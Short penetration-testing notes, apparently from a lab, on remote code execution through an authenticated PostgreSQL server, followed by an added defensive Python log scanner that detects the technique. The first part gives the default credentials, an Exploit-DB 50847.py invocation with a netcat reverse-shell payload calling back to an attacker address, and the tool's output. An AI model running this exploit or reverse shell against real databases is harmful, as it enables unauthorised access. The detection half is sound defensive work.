Authenticated PostgreSQL
If we have valid credentials for a PostgreSQL DB, we should follow this article on RCE, as well as using this exploit if the versions match.
The default credentials are postgres:postgres
Depending on which system we are targeting, I recommend using this payload for getting a reverse shell out of this.
python /usr/share/exploitdb/exploits/multiple/remote/50847.py -i 192.168.143.47 -p 5437 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.143 80 >/tmp/f'
[+] Connecting to PostgreSQL Database on 192.168.143.47:5437
[+] Connection to Database established
[+] Checking PostgreSQL version
[+] PostgreSQL 11.7 is likely vulnerable
[+] Creating table _2dd6b3f0887b2a35a68630f8de3d4c67
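The defender's view of the run above, as an added example that is not part of the original notes or of 50847.py: a scan of the server log for the statements this kind of tool leaves behind. It assumes the command is executed through PostgreSQL's COPY ... FROM PROGRAM, that the server logs with log_statement = 'all' and log_line_prefix = '%t %r %u@%d ', and the log lines are constructed for the example.

```python
import re

# Constructed PostgreSQL log lines (assumed settings: log_statement = 'all',
# log_line_prefix = '%t %r %u@%d '); not captured from a real server.
SAMPLE_LOG = """\
2024-01-01 10:00:01 UTC 192.168.49.143(51234) postgres@postgres LOG:  statement: SELECT version()
2024-01-01 10:00:02 UTC 192.168.49.143(51234) postgres@postgres LOG:  statement: CREATE TABLE _2dd6b3f0887b2a35a68630f8de3d4c67(out text)
2024-01-01 10:00:02 UTC 192.168.49.143(51234) postgres@postgres LOG:  statement: COPY _2dd6b3f0887b2a35a68630f8de3d4c67 FROM PROGRAM 'id'
2024-01-01 10:05:00 UTC 10.0.0.5(40000) app@shop LOG:  statement: COPY orders FROM STDIN
"""

# Splits a line into timestamp, client address, role, database and SQL text.
LINE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) (?P<client>[\d.]+)\(\d+\) "
    r"(?P<user>\w+)@(?P<db>\w+) LOG:\s+statement: (?P<sql>.*)$"
)
RULES = {
    # COPY ... FROM/TO PROGRAM runs an OS command as the server's OS account.
    "copy_program": re.compile(r"\bCOPY\b.+?\b(?:FROM|TO)\s+PROGRAM\b", re.I),
    # Scratch table named "_" + 32 hex characters, as in the tool output above.
    "hex_scratch_table": re.compile(
        r"\b(?:CREATE|DROP)\s+TABLE\b.*?\b_[0-9a-f]{32}\b", re.I),
}

def scan(log_text):
    """Return (rule, user, client, sql) for every statement a rule matches."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a statement line in the assumed prefix format
        for name, rx in RULES.items():
            if rx.search(m["sql"]):
                hits.append((name, m["user"], m["client"], m["sql"]))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep=" | ")
```

Ordinary COPY ... FROM STDIN traffic is not flagged; a hit from the postgres role on a non-local client address is the combination worth alerting on.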